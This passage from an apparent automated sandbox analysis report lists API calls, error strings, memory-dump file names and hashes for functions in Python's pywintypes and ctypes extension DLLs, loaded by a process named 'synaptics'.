                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7547db81ebfca5d78efbba79e44ca7a11e2ee7cb85afc5d8866285d85a240569
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 78012671B041049BCB08DBA9DD096ED77FCDF82259B1402A5EC0AD3701EB328E168AA5
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyArg_ParseTuple.PYTHON310(?,O:GetAuditedPermissionsFromAcl,?), ref: 6BF43918
                                                                                                                                                                                                              • GetAuditedPermissionsFromAclW.ADVAPI32(?,?,?,?), ref: 6BF4394C
                                                                                                                                                                                                              • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES310(GetAuditedPermissionsFromAcl,00000000), ref: 6BF4395C
                                                                                                                                                                                                                • Part of subcall function 6BF4A230: GetLastError.KERNEL32(00000000,6BF46624,MakeSelfRelativeSD,00000000), ref: 6BF4A239
                                                                                                                                                                                                                • Part of subcall function 6BF4A230: FormatMessageW.KERNEL32(00001B00,00000000,6BF46624,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6BF4A29A
                                                                                                                                                                                                                • Part of subcall function 6BF4A230: PyUnicode_DecodeMBCS.PYTHON310(?,?,ignore,?,00000000), ref: 6BF4A370
                                                                                                                                                                                                                • Part of subcall function 6BF4A230: _Py_BuildValue_SizeT.PYTHON310((iNN),6BF46624,00000000,00000000,?,00000000), ref: 6BF4A37E
                                                                                                                                                                                                              • Py_BuildValue.PYTHON310(6BF4FC00,?,?), ref: 6BF43973
                                                                                                                                                                                                              • PyMem_Free.PYTHON310(?), ref: 6BF4398E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • GetAuditedPermissionsFromAcl, xrefs: 6BF43957
                                                                                                                                                                                                              • O:GetAuditedPermissionsFromAcl, xrefs: 6BF43901
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Build$Arg_AuditedDecodeErrorError@@FormatFreeFromLastMem_MessageParsePermissionsSizeTupleU_object@@Unicode_ValueValue_Win_
                                                                                                                                                                                                              • String ID: GetAuditedPermissionsFromAcl$O:GetAuditedPermissionsFromAcl
                                                                                                                                                                                                              • API String ID: 775707309-1982696749
                                                                                                                                                                                                              • Opcode ID: ab9bc149f2e6de295fdd5627fd44abc15bf06b92be7159575ed748e9c9ecb101
                                                                                                                                                                                                              • Instruction ID: 79233a0bff9e501f01c95f4c143f456f80e3c9ca1a9b4d9519d37bc3c4e27dab
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ab9bc149f2e6de295fdd5627fd44abc15bf06b92be7159575ed748e9c9ecb101
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5511A772518312ABD714DF55CC44A5BBFE9EF84744F00082CF999C2166E735D618CB93
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyErr_Format.PYTHON310(6C7E9584,unicode string expected instead of %s instance,?), ref: 6C0AD142
                                                                                                                                                                                                              • PyUnicode_AsWideChar.PYTHON310(?,?,00000002), ref: 6C0AD159
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(?), ref: 6C0AD16D
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,one character unicode string expected), ref: 6C0AD182
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • one character unicode string expected, xrefs: 6C0AD17B
                                                                                                                                                                                                              • unicode string expected instead of %s instance, xrefs: 6C0AD13B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Err_$CharDeallocFormatStringUnicode_Wide
                                                                                                                                                                                                              • String ID: one character unicode string expected$unicode string expected instead of %s instance
                                                                                                                                                                                                              • API String ID: 1479195121-2255738861
                                                                                                                                                                                                              • Opcode ID: bb3ff4e100b230e43750549614bdbd0720e25ea23713d0bd6a6d47a1bbb1ea63
                                                                                                                                                                                                              • Instruction ID: aad4f68a8722e2fed2de31aee5a9d9871461cd718b6059a50f8a23bdfec71a08
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bb3ff4e100b230e43750549614bdbd0720e25ea23713d0bd6a6d47a1bbb1ea63
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2E11EDB0604245EFCB00DFA8E905AD433F8EF02B3CF004921FD2E96662DB329561CB89
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyArg_ParseTuple.PYTHON310(?,O:GetEffectiveRightsFromAcl,?), ref: 6BF43860
                                                                                                                                                                                                              • GetEffectiveRightsFromAclW.ADVAPI32(?,?,?), ref: 6BF4388F
                                                                                                                                                                                                              • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES310(GetEffectiveRightsFromAcl,00000000), ref: 6BF4389F
                                                                                                                                                                                                                • Part of subcall function 6BF4A230: GetLastError.KERNEL32(00000000,6BF46624,MakeSelfRelativeSD,00000000), ref: 6BF4A239
                                                                                                                                                                                                                • Part of subcall function 6BF4A230: FormatMessageW.KERNEL32(00001B00,00000000,6BF46624,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6BF4A29A
                                                                                                                                                                                                                • Part of subcall function 6BF4A230: PyUnicode_DecodeMBCS.PYTHON310(?,?,ignore,?,00000000), ref: 6BF4A370
                                                                                                                                                                                                                • Part of subcall function 6BF4A230: _Py_BuildValue_SizeT.PYTHON310((iNN),6BF46624,00000000,00000000,?,00000000), ref: 6BF4A37E
                                                                                                                                                                                                              • Py_BuildValue.PYTHON310(6BF4FAA4,?), ref: 6BF438AF
                                                                                                                                                                                                              • PyMem_Free.PYTHON310(?), ref: 6BF438CA
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • GetEffectiveRightsFromAcl, xrefs: 6BF4389A
                                                                                                                                                                                                              • O:GetEffectiveRightsFromAcl, xrefs: 6BF43851
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Build$Arg_DecodeEffectiveErrorError@@FormatFreeFromLastMem_MessageParseRightsSizeTupleU_object@@Unicode_ValueValue_Win_
                                                                                                                                                                                                              • String ID: GetEffectiveRightsFromAcl$O:GetEffectiveRightsFromAcl
                                                                                                                                                                                                              • API String ID: 1007228882-568366055
                                                                                                                                                                                                              • Opcode ID: 6ab07633f111b2a2b366ac897fcb02ecf731af99add535ee49c791a70b235c0e
                                                                                                                                                                                                              • Instruction ID: f739b91bf58cd57709e911b4c40f619f0bddbf8b24fa8967c101e0f9642aa07a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6ab07633f111b2a2b366ac897fcb02ecf731af99add535ee49c791a70b235c0e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2C015E73A18202AFE714EF64CC44A5BBFE8AF84654F404579F89981136E739DA1CC7A3
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7EA434,Attributes of PyDEVMODEW can't be deleted), ref: 6BF43E25
                                                                                                                                                                                                              • PyBytes_AsStringAndSize.PYTHON310(?,?,?), ref: 6BF43E3E
                                                                                                                                                                                                              • PyErr_Format.PYTHON310(6C7E9C54,Length of DriverData cannot be longer that DriverExtra (%d bytes),?), ref: 6BF43E6A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • Length of DriverData cannot be longer that DriverExtra (%d bytes), xrefs: 6BF43E63
                                                                                                                                                                                                              • Attributes of PyDEVMODEW can't be deleted, xrefs: 6BF43E1E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Err_String$Bytes_FormatSize
                                                                                                                                                                                                              • String ID: Attributes of PyDEVMODEW can't be deleted$Length of DriverData cannot be longer that DriverExtra (%d bytes)
                                                                                                                                                                                                              • API String ID: 1818008259-1897733207
                                                                                                                                                                                                              • Opcode ID: b5e5d516c872dc2538d9c7065f4b4f19ddc5960c9d568cd60382bc5d2855c930
                                                                                                                                                                                                              • Instruction ID: 1d040b6c6ea6dea1a896270e9cb1e33318e5d2230b2bdcc1100c6ebecc0aa02b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b5e5d516c872dc2538d9c7065f4b4f19ddc5960c9d568cd60382bc5d2855c930
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BF01DE73425100AFC708EB68CC08E6A3BE4AF55321F104658F566C22F3EB36D929CB52
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyErr_Format.PYTHON310(6C7E9584,unicode string expected instead of %s instance,?), ref: 6C0AD52B
                                                                                                                                                                                                              • PyUnicode_AsWideCharString.PYTHON310(?,?), ref: 6C0AD53F
                                                                                                                                                                                                              • SysAllocStringLen.OLEAUT32(00000000,?), ref: 6C0AD552
                                                                                                                                                                                                              • PyMem_Free.PYTHON310(00000000), ref: 6C0AD55B
                                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 6C0AD572
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • `<upj>uP?<u, xrefs: 6C0AD572
                                                                                                                                                                                                              • unicode string expected instead of %s instance, xrefs: 6C0AD524
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: String$Free$AllocCharErr_FormatMem_Unicode_Wide
                                                                                                                                                                                                              • String ID: `<upj>uP?<u$unicode string expected instead of %s instance
                                                                                                                                                                                                              • API String ID: 824488667-1966247830
                                                                                                                                                                                                              • Opcode ID: 6e21b019f6f197bbd86cb00ffe89be46e6faba98d673afb38d2613a3d2c84c99
                                                                                                                                                                                                              • Instruction ID: ba79844df39331e18d17b7f63d4f425d7aa7604885f760262d8f15aa1fe11103
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6e21b019f6f197bbd86cb00ffe89be46e6faba98d673afb38d2613a3d2c84c99
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D701CCB2604241EFCF04CFA8DA08AD67BF8EF4676DB044465FD0987201DB32DA16CB94
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9C54,ctypes objects containing pointers cannot be pickled), ref: 6C0A4354
                                                                                                                                                                                                              • PyObject_GetAttrString.PYTHON310(?,__dict__), ref: 6C0A4369
                                                                                                                                                                                                              • PyBytes_FromStringAndSize.PYTHON310(?,?), ref: 6C0A4382
                                                                                                                                                                                                              • _Py_BuildValue_SizeT.PYTHON310(O(O(NN)),?,00000000,00000000), ref: 6C0A4398
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: String$Size$AttrBuildBytes_Err_FromObject_Value_
                                                                                                                                                                                                              • String ID: O(O(NN))$__dict__$ctypes objects containing pointers cannot be pickled
                                                                                                                                                                                                              • API String ID: 1770468409-724424928
                                                                                                                                                                                                              • Opcode ID: 4ddfe4098748338bdd329004b86ac43cb5580280f2813a00b80a59bee1b95f3c
                                                                                                                                                                                                              • Instruction ID: 6047b02fa3cd196fd77839f349f67e17fb105c15ad2541561d1a5860a0d68d19
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4ddfe4098748338bdd329004b86ac43cb5580280f2813a00b80a59bee1b95f3c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B301D476309541ABCF119BC8DE08E9677F9EB8561AB044824FA4DD6921CF33E411CB54
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,?), ref: 6BF43EB9
                                                                                                                                                                                                              • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?), ref: 6BF43EC9
                                                                                                                                                                                                              • PyErr_Format.PYTHON310(6C7EADFC,PyDEVMODE::PyDEVMODE - Unable to allocate DEVMODE of size %d,?), ref: 6BF43EF0
                                                                                                                                                                                                              • _Py_NewReference.PYTHON310 ref: 6BF43EFA
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(00000000,?,?), ref: 6BF43F0C
                                                                                                                                                                                                              • _Py_NewReference.PYTHON310 ref: 6BF43F15
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • PyDEVMODE::PyDEVMODE - Unable to allocate DEVMODE of size %d, xrefs: 6BF43EE9
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Referencememcpy$Err_Formatmalloc
                                                                                                                                                                                                              • String ID: PyDEVMODE::PyDEVMODE - Unable to allocate DEVMODE of size %d
                                                                                                                                                                                                              • API String ID: 2849227754-318570358
                                                                                                                                                                                                              • Opcode ID: e474b6a1dce501861df0d6c9313394cb745b0157d2435366ccd7875357c098c3
                                                                                                                                                                                                              • Instruction ID: 4a928f33e5670f1ca7163268aad273e0091986bf4a1889aae7fdde6c1c20dd73
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e474b6a1dce501861df0d6c9313394cb745b0157d2435366ccd7875357c098c3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2A01D4B2510531ABD714AB29EC08D77BBA8FF91715700443AFA45C2222E739E934C3F5
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyModule_Create2.PYTHON310(6C0B61FC,000003F5), ref: 6C0A857B
                                                                                                                                                                                                              • PyObject_GetAttrString.PYTHON310(00000000,_unpickle), ref: 6C0A8590
                                                                                                                                                                                                              • PyDict_New.PYTHON310 ref: 6C0A85A2
                                                                                                                                                                                                              • PyErr_NewException.PYTHON310(ctypes.ArgumentError,00000000,00000000), ref: 6C0A85BA
                                                                                                                                                                                                                • Part of subcall function 6C0A7ED0: PyType_Ready.PYTHON310(6C0B5D90,?,00000000,?,6C0A85D3), ref: 6C0A7EE0
                                                                                                                                                                                                                • Part of subcall function 6C0A7ED0: PyType_Ready.PYTHON310(6C0B5C88,6C0A85D3), ref: 6C0A7EF2
                                                                                                                                                                                                                • Part of subcall function 6C0A7ED0: PyType_Ready.PYTHON310(6C0B56F8), ref: 6C0A7F04
                                                                                                                                                                                                                • Part of subcall function 6C0A7ED0: PyType_Ready.PYTHON310(6C0B6110), ref: 6C0A7F20
                                                                                                                                                                                                                • Part of subcall function 6C0A7ED0: PyType_Ready.PYTHON310(6C0B5360), ref: 6C0A7F3C
                                                                                                                                                                                                                • Part of subcall function 6C0A7ED0: PyType_Ready.PYTHON310(6C0B64C8), ref: 6C0A7F58
                                                                                                                                                                                                                • Part of subcall function 6C0A7ED0: PyType_Ready.PYTHON310(6C0B57F8), ref: 6C0A7F74
                                                                                                                                                                                                                • Part of subcall function 6C0A7ED0: PyType_Ready.PYTHON310(6C0B5238), ref: 6C0A7F90
                                                                                                                                                                                                                • Part of subcall function 6C0A7ED0: PyType_Ready.PYTHON310(6C0B59C0), ref: 6C0A7FAC
                                                                                                                                                                                                                • Part of subcall function 6C0A7ED0: PyType_Ready.PYTHON310(6C0B5048), ref: 6C0A7FC8
                                                                                                                                                                                                                • Part of subcall function 6C0A7ED0: PyModule_AddType.PYTHON310(00000000,6C0B6828), ref: 6C0A7FF5
                                                                                                                                                                                                                • Part of subcall function 6C0A7ED0: PyModule_AddType.PYTHON310(00000000,6C0B65E0), ref: 6C0A801C
                                                                                                                                                                                                                • Part of subcall function 6C0A7ED0: PyModule_AddType.PYTHON310(00000000,6C0B5438), ref: 6C0A8043
                                                                                                                                                                                                                • Part of subcall function 6C0A7ED0: PyModule_AddType.PYTHON310(00000000,6C0B5160), ref: 6C0A806A
                                                                                                                                                                                                                • Part of subcall function 6C0A8120: PyModule_AddObjectRef.PYTHON310(00000000,_pointer_type_cache,046255C8,?,00000000,?,00000000,?,6C0A85E8), ref: 6C0A8138
                                                                                                                                                                                                                • Part of subcall function 6C0A8120: _Py_Dealloc.PYTHON310(046255C9,00000000,?,6C0A85E8), ref: 6C0A8155
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6C0A85F6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ReadyType_$Module_$Type$Dealloc$AttrCreate2Dict_Err_ExceptionObjectObject_String
                                                                                                                                                                                                              • String ID: _unpickle$ctypes.ArgumentError
                                                                                                                                                                                                              • API String ID: 864454501-165408235
                                                                                                                                                                                                              • Opcode ID: 42ed6dd3ac14fe5eba5675ca4befd074bf5653e1e3d94dbeb11dff682b9a4835
                                                                                                                                                                                                              • Instruction ID: 1953c4efe6660cb7699cda962c1da409e4bf4367e93b6ca06eea0639dd29f8b0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 42ed6dd3ac14fe5eba5675ca4befd074bf5653e1e3d94dbeb11dff682b9a4835
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1C01A770B1169347EA059BF45D093C636E45B0265CF040625EE15E5782FF22CD0287AD
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _Py_FatalErrorFunc.PYTHON310(PyWinInterpreterState_Ensure,pywintypes: can not setup interpreter state, as current state is invalid), ref: 6BF49FE7
                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000008), ref: 6BF4A000
                                                                                                                                                                                                              • _Py_FatalErrorFunc.PYTHON310(PyWinInterpreterState_Ensure,Out of memory allocating thread state.), ref: 6BF4A016
                                                                                                                                                                                                              • TlsSetValue.KERNEL32(00000000), ref: 6BF4A023
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • pywintypes: can not setup interpreter state, as current state is invalid, xrefs: 6BF49FDD
                                                                                                                                                                                                              • PyWinInterpreterState_Ensure, xrefs: 6BF49FE2, 6BF4A011
                                                                                                                                                                                                              • Out of memory allocating thread state., xrefs: 6BF4A00C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorFatalFunc$AllocLocalValue
                                                                                                                                                                                                              • String ID: Out of memory allocating thread state.$PyWinInterpreterState_Ensure$pywintypes: can not setup interpreter state, as current state is invalid
                                                                                                                                                                                                              • API String ID: 730850069-1490924957
                                                                                                                                                                                                              • Opcode ID: e03e4bd463c5722f993febbee0bd37de17ad1950965dfedce3f1b36cf38665c5
                                                                                                                                                                                                              • Instruction ID: 71fc85d258fa622b4a0e950c9c34a14d51013f2da55682c5fc6bf7451d60beac
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e03e4bd463c5722f993febbee0bd37de17ad1950965dfedce3f1b36cf38665c5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D5F02D73D682016FD7059B789C04F4A3EF0EF65311F000025F145D6262DA29C524C772
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 6BF4A6FA
                                                                                                                                                                                                              • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES310(DosDateTimeToFileTime,00000000), ref: 6BF4A70A
                                                                                                                                                                                                                • Part of subcall function 6BF4A230: GetLastError.KERNEL32(00000000,6BF46624,MakeSelfRelativeSD,00000000), ref: 6BF4A239
                                                                                                                                                                                                                • Part of subcall function 6BF4A230: FormatMessageW.KERNEL32(00001B00,00000000,6BF46624,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6BF4A29A
                                                                                                                                                                                                                • Part of subcall function 6BF4A230: PyUnicode_DecodeMBCS.PYTHON310(?,?,ignore,?,00000000), ref: 6BF4A370
                                                                                                                                                                                                                • Part of subcall function 6BF4A230: _Py_BuildValue_SizeT.PYTHON310((iNN),6BF46624,00000000,00000000,?,00000000), ref: 6BF4A37E
                                                                                                                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 6BF4A72B
                                                                                                                                                                                                              • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES310(FileTimeToSystemTime,00000000), ref: 6BF4A73B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Time$Error@@FileU_object@@Win_$BuildDateDecodeErrorFormatLastMessageSizeSystemUnicode_Value_
                                                                                                                                                                                                              • String ID: DosDateTimeToFileTime$FileTimeToSystemTime
                                                                                                                                                                                                              • API String ID: 2618345427-3006328108
                                                                                                                                                                                                              • Opcode ID: 473f98cf9a55aefa24792bcb3f6e55741525ad605bc4e720759a38c1e32769a4
                                                                                                                                                                                                              • Instruction ID: ee6914282db5f0a14a77c29877a42f8e830a9d1cb1aeb5d18f35bfabf802c644
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 473f98cf9a55aefa24792bcb3f6e55741525ad605bc4e720759a38c1e32769a4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 41F086B79182016BD7449B748C4695F7BECBE98308F84087CF48E81122EB2DD6148763
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7EB154,SetSecurityDescriptorControl does not exist on this platform), ref: 6BF472C8
                                                                                                                                                                                                              • PyArg_ParseTuple.PYTHON310(?,ll:SetSecurityDescriptorControl,?), ref: 6BF472E9
                                                                                                                                                                                                              • SetSecurityDescriptorControl.ADVAPI32(?,?), ref: 6BF47304
                                                                                                                                                                                                              • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES310(SetSecurityDescriptorControl,00000000), ref: 6BF47314
                                                                                                                                                                                                              Strings
